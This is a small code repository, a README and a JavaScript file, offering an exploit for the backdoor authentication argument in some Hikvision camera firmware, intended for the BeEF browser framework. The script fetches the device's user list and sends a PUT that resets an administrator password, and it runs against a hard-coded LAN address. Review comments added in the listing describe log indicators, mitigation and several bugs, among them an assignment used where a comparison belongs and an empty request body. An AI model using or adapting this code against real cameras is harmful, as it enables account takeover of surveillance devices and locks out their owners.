├── README.md
└── exploit.js

/README.md:
--------------------------------------------------------------------------------
1 | # hikvisionBackdoorExploit
2 | Hikvision camera backdoor exploit for beef framework (hikvision versions 5.2.0 - 5.3.9)
3 |
4 |
5 | # This is not finished, works from browser console only.
6 |
--------------------------------------------------------------------------------
/exploit.js:
--------------------------------------------------------------------------------
     // Review notes (defensive reading of this listing):
     // - Every request below targets the device's /Security/users endpoints and
     //   appends the fixed query argument held in backdoorAuthArg; the variable
     //   name and the README describe it as a backdoor authentication argument,
     //   and the README scopes it to Hikvision firmware 5.2.0 - 5.3.9.
     // - The argument is a constant string, so requests to /Security/users that
     //   carry it are a stable thing to search for in proxy, WAF or device HTTP
     //   logs, as is an unexpected PUT to /Security/users/<id>.
     // - The script uses browser APIs (XMLHttpRequest, DOMParser) and a
     //   private-range address, so the requests come from whichever browser runs
     //   it; a camera reachable only from the internal LAN is still reachable
     //   from that browser.
     // - Mitigation is on the device side: run firmware outside the range named
     //   in the README (confirm the fixed version against the vendor advisory)
     //   and keep the camera's web interface off networks that general-purpose
     //   browsers can reach.

     // Sentinel passed to callbacks in place of a response when a request fails;
     // callers compare against it to detect failure.
1 | var errorMessage = 'Could not execute exploit.';
     // Password value that the call at the bottom of the file passes to exploit().
2 | var newPassword = "admin";
     // Fixed query-string argument appended to every /Security/users URL below.
3 | var backdoorAuthArg = "auth=YWRtaW46MTEK";
4 |
     /**
      * Issues an asynchronous GET and reports the outcome through `callback`.
      *
      * The request is opened with the hard-coded user name "admin" and password
      * "admin", and with `withCredentials` set to false.
      *
      * @param {string} url - Full URL to fetch.
      * @param {function(string)} callback - Receives `responseText` when the
      *   request completes with status 200, or `errorMessage` when the status is
      *   400 or above. Any other status never invokes it.
      */
5 | function httpGet(url, callback) {
6 |     var xhr = new XMLHttpRequest();
7 |     xhr.withCredentials = false;
8 |     xhr.open("GET", url, true, "admin", "admin");
9 |     xhr.onreadystatechange = (function processRequest(e) {
10 |         if( xhr.readyState == 4 && xhr.status == 200) {
11 |             return callback(xhr.responseText);
12 |         }
     // This branch does not check readyState, so it can run on more than one
     // state change once an error status is known.
13 |         else if(xhr.status >= 400){
14 |             return callback(errorMessage);
15 |         }
16 |     });
17 |     xhr.send();
18 | }
19 |
     /**
      * Requests `<ip>/Security/users?<backdoorAuthArg>` through httpGet and hands
      * the parsed user list to `callback`.
      *
      * @param {string} ip - Base URL of the device; the only caller in this file
      *   passes a value that includes the scheme ("https://...").
      * @param {function} callback - Receives the first <UserList> element of the
      *   XML response (undefined if the response has none), or `errorMessage`
      *   when httpGet reported a failure.
      */
20 | function hikvisionGetUserList(ip, callback) {
21 |     httpGet(ip + "/Security/users?" + backdoorAuthArg, function returned(response){
22 |         if(response != errorMessage) {
     // The response body is parsed as XML and only the first <UserList> is kept.
23 |             var xmlDoc = (new DOMParser()).parseFromString(response,"text/xml").getElementsByTagName("UserList")[0];
24 |             return callback(xmlDoc);
25 |         }
26 |         return callback(errorMessage);
27 |     });
28 | }
29 |
     /**
      * Sends an asynchronous PUT to `<ip>/Security/users/<userid>?<backdoorAuthArg>`
      * whose body is built from the given user id, user name and password.
      *
      * @param {string} ip - Base URL of the device.
      * @param {string} userid - Id placed in both the URL path and the body.
      * @param {string} username - User name placed in the body.
      * @param {string} password - Password value placed in the body.
      * @param {function(string)} callback - Receives `responseText` on status 200
      *   at readyState 4, or `errorMessage` when the status is 400 or above.
      */
30 | function hikvisionChangeUserPassword(ip, userid, username, password, callback) {
     // NOTE(review): as rendered on this page the literal pieces between the
     // three values are empty; any markup the original file held here is not
     // visible in this listing.
31 |     var userXml =
32 | '\
33 | ' + userid + '\
34 | ' + username + '\
35 | ' + password + '\
36 | ';
     // xmlDoc is only used by the console.log at the end of this function; the
     // string userXml, not the parsed document, is what gets sent.
37 |     var parser = new DOMParser();
38 |     var xmlDoc = parser.parseFromString(userXml,"text/xml");
39 |
40 |     var url = ip + "/Security/users/" + userid + "?" + backdoorAuthArg;
41 |     var xhr = new XMLHttpRequest();
42 |     xhr.open("PUT", url, true);
     // The handler is attached after send(); the request was opened as
     // asynchronous (third open() argument is true).
43 |     xhr.send(userXml);
44 |     xhr.onreadystatechange = (function processRequest(e) {
45 |         if( xhr.readyState == 4 && xhr.status == 200) {
46 |             return callback(xhr.responseText);
47 |         }
48 |         else if(xhr.status >= 400){
49 |             return callback(errorMessage);
50 |         }
51 |     });
52 |     console.log(xmlDoc);
53 | }
54 |
     /**
      * Fetches the user list from `ip` and calls hikvisionChangeUserPassword for
      * an entry in it, logging the device's response to the console.
      *
      * @param {string} ip - Base URL of the device.
      * @param {string} password - Password value forwarded to
      *   hikvisionChangeUserPassword.
      * @returns {undefined} Nothing is returned to the caller; the `return`
      *   statements below belong to the inner callback.
      */
55 | function exploit(ip, password) {
56 |     hikvisionGetUserList(ip, function returned(xmlDoc) {
     // NOTE(review): `userList` is declared with `var` on the next line, so it is
     // hoisted and still undefined here; this comparison never inspects xmlDoc,
     // and the failure value from hikvisionGetUserList is not filtered out.
57 |         if(userList != errorMessage) {
58 |             var userList = xmlDoc.getElementsByTagName("User");
     // No declaration of `i` is visible in this listing, so the loop counter is
     // an implicit global.
59 |             for (i = 0; i < userList.length; i++) {
60 |                 var priority = userList[i].getElementsByTagName("priority")[0].innerHTML;
61 |                 var id = userList[i].getElementsByTagName("id")[0].innerHTML;
62 |                 var userName = userList[i].getElementsByTagName("userName")[0].innerHTML;
63 |                 var userLevel = userList[i].getElementsByTagName("userLevel")[0].innerHTML;
64 |
     // NOTE(review): `=` assigns rather than compares, so both conditions are
     // always truthy; as written, the first <User> entry is acted on whatever
     // its priority and userLevel are.
65 |                 if(priority = "high"){
66 |                     if(userLevel = "Administrator"){
67 |                         hikvisionChangeUserPassword(ip, id, userName, password, function call(response) {
68 |                             console.log(response);
69 |                         });
     // Leaves the callback (and the loop) after the first request is issued.
70 |                         return 1;
71 |                     }
72 |                 }
73 |             }
74 |         }
75 |         return errorMessage;
76 |     });
77 | }
78 |
79 |
     // Runs as soon as the script loads, against a hard-coded private-range
     // address, forwarding newPassword ("admin") as the password value.
80 | exploit("https://192.168.1.203", newPassword);
81 |
--------------------------------------------------------------------------------